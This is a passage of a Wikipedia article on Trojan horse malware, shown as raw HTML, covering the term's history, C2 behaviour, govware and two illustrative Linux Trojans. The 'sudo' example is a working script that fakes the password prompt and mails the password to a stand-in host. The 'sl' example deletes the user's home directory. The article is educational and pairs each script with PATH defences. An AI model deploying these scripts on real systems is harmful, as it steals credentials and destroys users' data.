id="vector-appearance-pinned-container" class="vector-pinned-container"> <div id="vector-appearance" class="vector-appearance vector-pinnable-element"> <div class="vector-pinnable-header vector-appearance-pinnable-header vector-pinnable-header-pinned" data-feature-name="appearance-pinned" data-pinnable-element-id="vector-appearance" data-pinned-container-id="vector-appearance-pinned-container" data-unpinned-container-id="vector-appearance-unpinned-container" > <div class="vector-pinnable-header-label">Appearance</div> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-pin-button" data-event-name="pinnable-header.vector-appearance.pin">move to sidebar</button> <button class="vector-pinnable-header-toggle-button vector-pinnable-header-unpin-button" data-event-name="pinnable-header.vector-appearance.unpin">hide</button> </div> </div> </div> </nav> </div> </div> <div id="bodyContent" class="vector-body" aria-labelledby="firstHeading" data-mw-ve-target-container> <div class="vector-body-before-content"> <div class="mw-indicators"> </div> <div id="siteSub" class="noprint">From Wikipedia, the free encyclopedia</div> </div> <div id="contentSub"><div id="mw-content-subtitle"></div></div> <div id="mw-content-text" class="mw-body-content"><div class="mw-content-ltr mw-parser-output" lang="en" dir="ltr"><div class="shortdescription nomobile noexcerpt noprint searchaux" style="display:none">Type of malware</div><style data-mw-deduplicate="TemplateStyles:r1236090951">.mw-parser-output .hatnote{font-style:italic}.mw-parser-output div.hatnote{padding-left:1.6em;margin-bottom:0.5em}.mw-parser-output .hatnote i{font-style:normal}.mw-parser-output .hatnote+link+.hatnote{margin-top:-0.5em}@media print{body.ns-0 .mw-parser-output .hatnote{display:none!important}}</style><div role="note" class="hatnote navigation-not-searchable">This article is about the type of computer malware. For the wooden horse in Greek mythology, see <a href="/wiki/Trojan_Horse" title="Trojan Horse">Trojan Horse</a>. For other uses, see <a href="/wiki/Trojan_Horse_(disambiguation)" class="mw-disambig" title="Trojan Horse (disambiguation)">Trojan Horse (disambiguation)</a>.</div> <p class="mw-empty-elt"> </p> <style data-mw-deduplicate="TemplateStyles:r1129693374">.mw-parser-output .hlist dl,.mw-parser-output .hlist ol,.mw-parser-output .hlist ul{margin:0;padding:0}.mw-parser-output .hlist dd,.mw-parser-output .hlist dt,.mw-parser-output .hlist li{margin:0;display:inline}.mw-parser-output .hlist.inline,.mw-parser-output .hlist.inline dl,.mw-parser-output .hlist.inline ol,.mw-parser-output .hlist.inline ul,.mw-parser-output .hlist dl dl,.mw-parser-output .hlist dl ol,.mw-parser-output .hlist dl ul,.mw-parser-output .hlist ol dl,.mw-parser-output .hlist ol ol,.mw-parser-output .hlist ol ul,.mw-parser-output .hlist ul dl,.mw-parser-output .hlist ul ol,.mw-parser-output .hlist ul ul{display:inline}.mw-parser-output .hlist .mw-empty-li{display:none}.mw-parser-output .hlist dt::after{content:": "}.mw-parser-output .hlist dd::after,.mw-parser-output .hlist li::after{content:" · ";font-weight:bold}.mw-parser-output .hlist dd:last-child::after,.mw-parser-output .hlist dt:last-child::after,.mw-parser-output .hlist li:last-child::after{content:none}.mw-parser-output .hlist dd dd:first-child::before,.mw-parser-output .hlist dd dt:first-child::before,.mw-parser-output .hlist dd li:first-child::before,.mw-parser-output .hlist dt dd:first-child::before,.mw-parser-output .hlist dt dt:first-child::before,.mw-parser-output .hlist dt li:first-child::before,.mw-parser-output .hlist li dd:first-child::before,.mw-parser-output .hlist li dt:first-child::before,.mw-parser-output .hlist li li:first-child::before{content:" (";font-weight:normal}.mw-parser-output .hlist dd dd:last-child::after,.mw-parser-output .hlist dd dt:last-child::after,.mw-parser-output .hlist dd li:last-child::after,.mw-parser-output .hlist dt dd:last-child::after,.mw-parser-output .hlist dt dt:last-child::after,.mw-parser-output .hlist dt li:last-child::after,.mw-parser-output .hlist li dd:last-child::after,.mw-parser-output .hlist li dt:last-child::after,.mw-parser-output .hlist li li:last-child::after{content:")";font-weight:normal}.mw-parser-output .hlist ol{counter-reset:listitem}.mw-parser-output .hlist ol>li{counter-increment:listitem}.mw-parser-output .hlist ol>li::before{content:" "counter(listitem)"\a0 "}.mw-parser-output .hlist dd ol>li:first-child::before,.mw-parser-output .hlist dt ol>li:first-child::before,.mw-parser-output .hlist li ol>li:first-child::before{content:" ("counter(listitem)"\a0 "}</style><style data-mw-deduplicate="TemplateStyles:r1246091330">.mw-parser-output .sidebar{width:22em;float:right;clear:right;margin:0.5em 0 1em 1em;background:var(--background-color-neutral-subtle,#f8f9fa);border:1px solid var(--border-color-base,#a2a9b1);padding:0.2em;text-align:center;line-height:1.4em;font-size:88%;border-collapse:collapse;display:table}body.skin-minerva .mw-parser-output .sidebar{display:table!important;float:right!important;margin:0.5em 0 1em 1em!important}.mw-parser-output .sidebar-subgroup{width:100%;margin:0;border-spacing:0}.mw-parser-output .sidebar-left{float:left;clear:left;margin:0.5em 1em 1em 0}.mw-parser-output .sidebar-none{float:none;clear:both;margin:0.5em 1em 1em 0}.mw-parser-output .sidebar-outer-title{padding:0 0.4em 0.2em;font-size:125%;line-height:1.2em;font-weight:bold}.mw-parser-output .sidebar-top-image{padding:0.4em}.mw-parser-output .sidebar-top-caption,.mw-parser-output .sidebar-pretitle-with-top-image,.mw-parser-output .sidebar-caption{padding:0.2em 0.4em 0;line-height:1.2em}.mw-parser-output .sidebar-pretitle{padding:0.4em 0.4em 0;line-height:1.2em}.mw-parser-output .sidebar-title,.mw-parser-output .sidebar-title-with-pretitle{padding:0.2em 0.8em;font-size:145%;line-height:1.2em}.mw-parser-output .sidebar-title-with-pretitle{padding:0.1em 0.4em}.mw-parser-output .sidebar-image{padding:0.2em 0.4em 0.4em}.mw-parser-output .sidebar-heading{padding:0.1em 0.4em}.mw-parser-output .sidebar-content{padding:0 0.5em 0.4em}.mw-parser-output .sidebar-content-with-subgroup{padding:0.1em 0.4em 0.2em}.mw-parser-output .sidebar-above,.mw-parser-output .sidebar-below{padding:0.3em 0.8em;font-weight:bold}.mw-parser-output .sidebar-collapse .sidebar-above,.mw-parser-output .sidebar-collapse .sidebar-below{border-top:1px solid #aaa;border-bottom:1px solid #aaa}.mw-parser-output .sidebar-navbar{text-align:right;font-size:115%;padding:0 0.4em 0.4em}.mw-parser-output .sidebar-list-title{padding:0 0.4em;text-align:left;font-weight:bold;line-height:1.6em;font-size:105%}.mw-parser-output .sidebar-list-title-c{padding:0 0.4em;text-align:center;margin:0 3.3em}@media(max-width:640px){body.mediawiki .mw-parser-output .sidebar{width:100%!important;clear:both;float:none!important;margin-left:0!important;margin-right:0!important}}body.skin--responsive .mw-parser-output .sidebar a>img{max-width:none!important}@media screen{html.skin-theme-clientpref-night .mw-parser-output .sidebar:not(.notheme) .sidebar-list-title,html.skin-theme-clientpref-night .mw-parser-output .sidebar:not(.notheme) .sidebar-title-with-pretitle{background:transparent!important}html.skin-theme-clientpref-night .mw-parser-output .sidebar:not(.notheme) .sidebar-title-with-pretitle a{color:var(--color-progressive)!important}}@media screen and (prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .sidebar:not(.notheme) .sidebar-list-title,html.skin-theme-clientpref-os .mw-parser-output .sidebar:not(.notheme) .sidebar-title-with-pretitle{background:transparent!important}html.skin-theme-clientpref-os .mw-parser-output .sidebar:not(.notheme) .sidebar-title-with-pretitle a{color:var(--color-progressive)!important}}@media print{body.ns-0 .mw-parser-output .sidebar{display:none!important}}</style><table class="sidebar sidebar-collapse nomobile"><tbody><tr><td class="sidebar-pretitle">Part of a series on</td></tr><tr><th class="sidebar-title-with-pretitle"><a href="/wiki/Security_hacker" title="Security hacker">Computer hacking</a></th></tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/List_of_security_hacking_incidents" title="List of security hacking incidents">History</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Phreaking" title="Phreaking">Phreaking</a></li> <li><a href="/wiki/Cryptovirology" title="Cryptovirology">Cryptovirology</a></li> <li><a href="/wiki/Hacking_of_consumer_electronics" title="Hacking of consumer electronics">Hacking of consumer electronics</a></li> <li><a href="/wiki/List_of_hackers" title="List of hackers">List of hackers</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Hacker_culture" title="Hacker culture">Hacker culture</a> and <a href="/wiki/Hacker_ethic" title="Hacker ethic">ethic</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Hackathon" title="Hackathon">Hackathon</a></li> <li><i><a href="/wiki/Hacker_Manifesto" title="Hacker Manifesto">Hacker Manifesto</a></i></li> <li><a href="/wiki/Hackerspace" title="Hackerspace">Hackerspace</a></li> <li><a href="/wiki/Hacktivism" title="Hacktivism">Hacktivism</a></li> <li><a href="/wiki/Maker_culture" title="Maker culture">Maker culture</a></li> <li>Types of <a href="/wiki/Hacker" title="Hacker">hackers</a> <ul><li><a href="/wiki/Black_hat_(computer_security)" title="Black hat (computer security)">Black hat</a></li> <li><a href="/wiki/Grey_hat" title="Grey hat">Grey hat</a></li> <li><a href="/wiki/White_hat_(computer_security)" title="White hat (computer security)">White hat</a></li></ul></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Computer_security_conference" title="Computer security conference">Conferences</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Black_Hat_Briefings" title="Black Hat Briefings">Black Hat Briefings</a></li> <li><a href="/wiki/Chaos_Communication_Congress" title="Chaos Communication Congress">Chaos Communication Congress</a></li> <li><a href="/wiki/DEF_CON" title="DEF CON">DEF CON</a></li> <li><a href="/wiki/Hackers_on_Planet_Earth" title="Hackers on Planet Earth">Hackers on Planet Earth</a></li> <li><a href="/wiki/Security_BSides" title="Security BSides">Security BSides</a></li> <li><a href="/wiki/ShmooCon" title="ShmooCon">ShmooCon</a></li> <li><a href="/wiki/Summercon" title="Summercon">Summercon</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Computer_crime" class="mw-redirect" title="Computer crime">Computer crime</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Crimeware" title="Crimeware">Crimeware</a></li> <li><a href="/wiki/List_of_computer_criminals" class="mw-redirect" title="List of computer criminals">List of computer criminals</a></li> <li><a href="/wiki/Script_kiddie" title="Script kiddie">Script kiddie</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Hacking_tool" class="mw-redirect" title="Hacking tool">Hacking tools</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Exploit_(computer_security)" title="Exploit (computer security)">Exploit</a></li> <li><a href="/wiki/List_of_digital_forensics_tools#Forensics-focused_operating_systems" title="List of digital forensics tools">forensics-focused operating systems</a></li> <li><a href="/wiki/Payload_(computing)" title="Payload (computing)">Payload</a></li> <li><a href="/wiki/Social_engineering_(security)" title="Social engineering (security)">Social engineering</a></li> <li><a href="/wiki/Vulnerability_(computing)" class="mw-redirect" title="Vulnerability (computing)">Vulnerability</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Hacker_culture" title="Hacker culture">Practice sites</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/HackThisSite" title="HackThisSite">HackThisSite</a></li> <li><a href="/wiki/Zone-H" title="Zone-H">Zone-H</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Malware" title="Malware">Malware</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Rootkit" title="Rootkit">Rootkit</a></li> <li><a href="/wiki/Backdoor_(computing)" title="Backdoor (computing)">Backdoor</a></li> <li><a class="mw-selflink selflink">Trojan horse</a></li> <li><a href="/wiki/Computer_virus" title="Computer virus">Virus</a></li> <li><a href="/wiki/Computer_worm" title="Computer worm">Worm</a></li> <li><a href="/wiki/Spyware" title="Spyware">Spyware</a></li> <li><a href="/wiki/Ransomware" title="Ransomware">Ransomware</a></li> <li><a href="/wiki/Logic_bomb" title="Logic bomb">Logic bomb</a></li> <li><a href="/wiki/Botnet" title="Botnet">Botnet</a></li> <li><a href="/wiki/Keystroke_logging" title="Keystroke logging">Keystroke logging</a></li> <li><a href="/wiki/Host-based_intrusion_detection_system" title="Host-based intrusion detection system">HIDS</a></li> <li><a href="/wiki/Web_shell" title="Web shell">Web shell</a></li> <li><a href="/wiki/Arbitrary_code_execution" title="Arbitrary code execution">RCE</a></li> <li><a href="/wiki/Infostealer" title="Infostealer">Infostealer</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Computer_security" title="Computer security">Computer security</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Application_security" title="Application security">Application security</a></li> <li><a href="/wiki/Cloud_computing_security" title="Cloud computing security">Cloud computing security</a></li> <li><a href="/wiki/Network_security" title="Network security">Network security</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)"><a href="/wiki/Hacker_group" title="Hacker group">Groups</a></div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><a href="/wiki/Anonymous_(group)" class="mw-redirect" title="Anonymous (group)">Anonymous</a></li> <li><a href="/wiki/Chaos_Computer_Club" title="Chaos Computer Club">Chaos Computer Club</a></li> <li><a href="/wiki/Homebrew_Computer_Club" title="Homebrew Computer Club">Homebrew Computer Club</a> (defunct)</li> <li><a href="/wiki/Legion_of_Doom_(hacking)" class="mw-redirect" title="Legion of Doom (hacking)">Legion of Doom</a> (defunct)</li> <li><a href="/wiki/LulzSec" title="LulzSec">LulzSec</a> (defunct)</li> <li><a href="/wiki/Masters_of_Deception" title="Masters of Deception">Masters of Deception</a> (defunct)</li> <li><a href="/wiki/Red_team" title="Red team">Red team</a> / <a href="/wiki/Blue_team_(computer_security)" title="Blue team (computer security)">Blue team</a></li></ul></div></div></td> </tr><tr><td class="sidebar-content"> <div class="sidebar-list mw-collapsible mw-collapsed"><div class="sidebar-list-title" style="border-top:1px solid #aaa;text-align:center;;color: var(--color-base)">Publications</div><div class="sidebar-list-content mw-collapsible-content hlist"> <ul><li><i><a href="/wiki/2600:_The_Hacker_Quarterly" title="2600: The Hacker Quarterly">2600: The Hacker Quarterly</a></i></li> <li><a href="/wiki/Hacker_News" title="Hacker News">Hacker News</a></li> <li><i><a href="/wiki/Nuts_and_Volts" title="Nuts and Volts">Nuts and Volts</a></i></li> <li><i><a href="/wiki/Phrack" title="Phrack">Phrack</a></i></li></ul></div></div></td> </tr><tr><td class="sidebar-navbar"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><style data-mw-deduplicate="TemplateStyles:r1239400231">.mw-parser-output .navbar{display:inline;font-size:88%;font-weight:normal}.mw-parser-output .navbar-collapse{float:left;text-align:left}.mw-parser-output .navbar-boxtext{word-spacing:0}.mw-parser-output .navbar ul{display:inline-block;white-space:nowrap;line-height:inherit}.mw-parser-output .navbar-brackets::before{margin-right:-0.125em;content:"[ "}.mw-parser-output .navbar-brackets::after{margin-left:-0.125em;content:" ]"}.mw-parser-output .navbar li{word-spacing:-0.125em}.mw-parser-output .navbar a>span,.mw-parser-output .navbar a>abbr{text-decoration:inherit}.mw-parser-output .navbar-mini abbr{font-variant:small-caps;border-bottom:none;text-decoration:none;cursor:inherit}.mw-parser-output .navbar-ct-full{font-size:114%;margin:0 7em}.mw-parser-output .navbar-ct-mini{font-size:114%;margin:0 4em}html.skin-theme-clientpref-night .mw-parser-output .navbar li a abbr{color:var(--color-base)!important}@media(prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .navbar li a abbr{color:var(--color-base)!important}}@media print{.mw-parser-output .navbar{display:none!important}}</style><div class="navbar plainlinks hlist navbar-mini"><ul><li class="nv-view"><a href="/wiki/Template:Computer_hacking" title="Template:Computer hacking"><abbr title="View this template">v</abbr></a></li><li class="nv-talk"><a href="/wiki/Template_talk:Computer_hacking" title="Template talk:Computer hacking"><abbr title="Discuss this template">t</abbr></a></li><li class="nv-edit"><a href="/wiki/Special:EditPage/Template:Computer_hacking" title="Special:EditPage/Template:Computer hacking"><abbr title="Edit this template">e</abbr></a></li></ul></div></td></tr></tbody></table> <p>In <a href="/wiki/Computing" title="Computing">computing</a>, a <b>Trojan horse</b> (or simply <b>Trojan</b>) is any <a href="/wiki/Malware" title="Malware">malware</a> that misleads users of its true intent by disguising itself as a standard program. The term is derived from the <a href="/wiki/Ancient_Greece" title="Ancient Greece">ancient Greek</a> story of the deceptive <a href="/wiki/Trojan_Horse" title="Trojan Horse">Trojan Horse</a> that led to the fall of the city of <a href="/wiki/Troy" title="Troy">Troy</a>.<sup id="cite_ref-1" class="reference"><a href="#cite_note-1"><span class="cite-bracket">&#91;</span>1<span class="cite-bracket">&#93;</span></a></sup> </p><p>Trojans are generally spread by some form of <a href="/wiki/Social_engineering_(security)" title="Social engineering (security)">social engineering</a>. For example, where a user is duped into executing an <a href="/wiki/Email" title="Email">email</a> attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a <a href="/wiki/Backdoor_(computing)" title="Backdoor (computing)">backdoor</a>, contacting a controller who can then have unauthorized access to the affected computer.<sup id="cite_ref-2" class="reference"><a href="#cite_note-2"><span class="cite-bracket">&#91;</span>2<span class="cite-bracket">&#93;</span></a></sup> <a href="/wiki/Ransomware" title="Ransomware">Ransomware</a> attacks are often carried out using a Trojan. </p><p>Unlike <a href="/wiki/Computer_virus" title="Computer virus">computer viruses</a> and <a href="/wiki/Computer_worm" title="Computer worm">worms</a>, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.<sup id="cite_ref-3" class="reference"><a href="#cite_note-3"><span class="cite-bracket">&#91;</span>3<span class="cite-bracket">&#93;</span></a></sup> </p> <meta property="mw:PageProp/toc" /> <div class="mw-heading mw-heading2"><h2 id="Use_of_the_term">Use of the term</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=1" title="Edit section: Use of the term"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <p>It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first <a href="/wiki/Unix" title="Unix">Unix</a> manual assumed its readers knew both.<sup id="cite_ref-4" class="reference"><a href="#cite_note-4"><span class="cite-bracket">&#91;</span>4<span class="cite-bracket">&#93;</span></a></sup> </p><p>Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the <a href="/wiki/Multics" title="Multics">Multics</a> computer systems.<sup id="cite_ref-Multics_5-0" class="reference"><a href="#cite_note-Multics-5"><span class="cite-bracket">&#91;</span>5<span class="cite-bracket">&#93;</span></a></sup> </p><p>It was made popular by <a href="/wiki/Ken_Thompson" title="Ken Thompson">Ken Thompson</a> in his 1983 <a href="/wiki/Turing_Award" title="Turing Award">Turing Award</a> acceptance lecture "Reflections on Trusting Trust",<sup id="cite_ref-6" class="reference"><a href="#cite_note-6"><span class="cite-bracket">&#91;</span>6<span class="cite-bracket">&#93;</span></a></sup> subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.<sup id="cite_ref-7" class="reference"><a href="#cite_note-7"><span class="cite-bracket">&#91;</span>7<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-8" class="reference"><a href="#cite_note-8"><span class="cite-bracket">&#91;</span>8<span class="cite-bracket">&#93;</span></a></sup> </p> <div class="mw-heading mw-heading2"><h2 id="Behavior">Behavior</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=2" title="Edit section: Behavior"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <p>Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more <a href="/wiki/Botnet#Command_and_control" title="Botnet">Command and Control</a> (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action.<sup id="cite_ref-Crapanzano_9-0" class="reference"><a href="#cite_note-Crapanzano-9"><span class="cite-bracket">&#91;</span>9<span class="cite-bracket">&#93;</span></a></sup> </p><p>In German-speaking countries, <a href="/wiki/Spyware" title="Spyware">spyware</a> used or made by the government is sometimes called <i>govware</i>. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.<sup id="cite_ref-cupa_10-0" class="reference"><a href="#cite_note-cupa-10"><span class="cite-bracket">&#91;</span>10<span class="cite-bracket">&#93;</span></a></sup><sup id="cite_ref-11" class="reference"><a href="#cite_note-11"><span class="cite-bracket">&#91;</span>11<span class="cite-bracket">&#93;</span></a></sup> Examples of govware Trojans include the Swiss <a href="/wiki/MiniPanzer_and_MegaPanzer" title="MiniPanzer and MegaPanzer">MiniPanzer and MegaPanzer</a><sup id="cite_ref-tech_12-0" class="reference"><a href="#cite_note-tech-12"><span class="cite-bracket">&#91;</span>12<span class="cite-bracket">&#93;</span></a></sup> and the <a href="/wiki/Staatstrojaner" class="mw-redirect" title="Staatstrojaner">German "state Trojan" nicknamed R2D2</a>.<sup id="cite_ref-cupa_10-1" class="reference"><a href="#cite_note-cupa-10"><span class="cite-bracket">&#91;</span>10<span class="cite-bracket">&#93;</span></a></sup> German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.<sup id="cite_ref-13" class="reference"><a href="#cite_note-13"><span class="cite-bracket">&#91;</span>13<span class="cite-bracket">&#93;</span></a></sup> </p><p>Due to the popularity of <a href="/wiki/Botnet" title="Botnet">botnets</a> among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by <a href="/wiki/Bitdefender" title="Bitdefender">BitDefender</a> from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.<sup id="cite_ref-14" class="reference"><a href="#cite_note-14"><span class="cite-bracket">&#91;</span>14<span class="cite-bracket">&#93;</span></a></sup> BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.<sup id="cite_ref-15" class="reference"><a href="#cite_note-15"><span class="cite-bracket">&#91;</span>15<span class="cite-bracket">&#93;</span></a></sup> </p><p>Recent investigations have revealed that the Trojan horse method has been used as an attack on <a href="/wiki/Cloud_computing" title="Cloud computing">cloud computing</a> systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system.<sup id="cite_ref-16" class="reference"><a href="#cite_note-16"><span class="cite-bracket">&#91;</span>16<span class="cite-bracket">&#93;</span></a></sup> </p> <div class="mw-heading mw-heading2"><h2 id="Linux_sudo_example">Linux sudo example</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=3" title="Edit section: Linux sudo example"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <p>A <i>Trojan horse</i> is a <a href="/wiki/Computer_program" title="Computer program">program</a> that purports to perform some legitimate function, yet upon execution it compromises the user's security.<sup id="cite_ref-uss_42_17-0" class="reference"><a href="#cite_note-uss_42-17"><span class="cite-bracket">&#91;</span>17<span class="cite-bracket">&#93;</span></a></sup> A simple example is the following malicious version of the Linux <a href="/wiki/Sudo" title="Sudo">sudo</a> command. An attacker would place this script in a publicly writable directory (e.g., <code>/tmp</code>). If an administrator happens to be in this directory and executes <code>sudo</code>, then the Trojan may execute, compromising the administrator's password. </p> <div class="mw-highlight mw-highlight-lang-sh mw-content-ltr" dir="ltr"><pre><span></span><span class="ch">#!/usr/bin/env bash</span> <span class="c1"># Turn off the character echo to the screen. sudo does this to prevent the user&#39;s password from appearing on screen when they type it in.</span> stty<span class="w"> </span>-echo <span class="c1"># Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.</span> <span class="nv">prompt_count</span><span class="o">=</span><span class="m">1</span> <span class="k">while</span><span class="w"> </span><span class="o">[</span><span class="w"> </span><span class="nv">$prompt_count</span><span class="w"> </span>-le<span class="w"> </span><span class="m">3</span><span class="w"> </span><span class="o">]</span><span class="p">;</span><span class="w"> </span><span class="k">do</span> <span class="w"> </span><span class="nb">echo</span><span class="w"> </span>-n<span class="w"> </span><span class="s2">&quot;[sudo] password for </span><span class="k">$(</span>whoami<span class="k">)</span><span class="s2">: &quot;</span> <span class="w"> </span><span class="nb">read</span><span class="w"> </span>password_input <span class="w"> </span><span class="nb">echo</span> <span class="w"> </span>sleep<span class="w"> </span><span class="m">3</span><span class="w"> </span><span class="c1"># sudo will pause between repeated prompts</span> <span class="w"> </span><span class="nv">prompt_count</span><span class="o">=</span><span class="k">$((</span><span class="w"> </span><span class="nv">prompt_count</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="k">))</span> <span class="k">done</span> <span class="c1"># Turn the character echo back on.</span> stty<span class="w"> </span><span class="nb">echo</span> <span class="nb">echo</span><span class="w"> </span><span class="nv">$password_input</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>mail<span class="w"> </span>-s<span class="w"> </span><span class="s2">&quot;</span><span class="k">$(</span>whoami<span class="k">)</span><span class="s2">&#39;s password&quot;</span><span class="w"> </span>outside@creep.com <span class="c1"># Display sudo&#39;s actual error message and then delete self.</span> <span class="nb">echo</span><span class="w"> </span><span class="s2">&quot;sudo: 3 incorrect password attempts&quot;</span> rm<span class="w"> </span><span class="nv">$0</span> <span class="nb">exit</span><span class="w"> </span><span class="m">1</span><span class="w"> </span><span class="c1"># sudo returns 1 with a failed password attempt</span> </pre></div> <p>To prevent a <code>sudo</code> <i>Trojan horse</i>, set the <code>.</code> entry in the <code><a href="/wiki/PATH_(variable)" title="PATH (variable)">PATH</a></code> environment variable to be located at the tail end.<sup id="cite_ref-uss_43_18-0" class="reference"><a href="#cite_note-uss_43-18"><span class="cite-bracket">&#91;</span>18<span class="cite-bracket">&#93;</span></a></sup> For example: <code>PATH=/usr/local/bin:/usr/bin:.</code>. </p> <div class="mw-heading mw-heading2"><h2 id="Linux_ls_example">Linux ls example</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=4" title="Edit section: Linux ls example"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <p>Having <code>.</code> somewhere in the PATH is convenient, but there is a catch.<sup id="cite_ref-19" class="reference"><a href="#cite_note-19"><span class="cite-bracket">&#91;</span>19<span class="cite-bracket">&#93;</span></a></sup> Another example is the following malicious version of the Linux <a href="/wiki/Ls" title="Ls">ls</a> command. However, the filename is not <code>ls</code>; instead, it is <code>sl</code>. An attacker would place this script in a publicly writable directory (e.g., <code>/tmp</code>). </p> <div class="mw-highlight mw-highlight-lang-sh mw-content-ltr" dir="ltr"><pre><span></span><span class="ch">#!/usr/bin/env bash</span> <span class="c1"># Remove the user&#39;s home directory, then remove self.</span> rm<span class="w"> </span>-fr<span class="w"> </span>~<span class="w"> </span><span class="m">2</span>&gt;/dev/null rm<span class="w"> </span><span class="nv">$0</span> </pre></div> <p>To prevent a malicious programmer from anticipating this common typing mistake: </p> <ol><li>omit <code>.</code> in the PATH or</li> <li><code>alias sl=ls</code><sup id="cite_ref-20" class="reference"><a href="#cite_note-20"><span class="cite-bracket">&#91;</span>a<span class="cite-bracket">&#93;</span></a></sup></li></ol> <div class="mw-heading mw-heading2"><h2 id="Notable_examples">Notable examples</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=5" title="Edit section: Notable examples"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <div class="mw-heading mw-heading3"><h3 id="Private_and_governmental">Private and governmental</h3><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=6" title="Edit section: Private and governmental"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <ul><li><a href="/wiki/ANOM" class="mw-redirect" title="ANOM">ANOM</a> – FBI</li> <li><a href="/wiki/Chaos_Computer_Club#Staatstrojaner_affair" title="Chaos Computer Club">0zapftis / r2d2 StaatsTrojaner</a> – DigiTask</li> <li><a href="/wiki/DarkComet" title="DarkComet">DarkComet</a> – CIA / NSA</li> <li><a 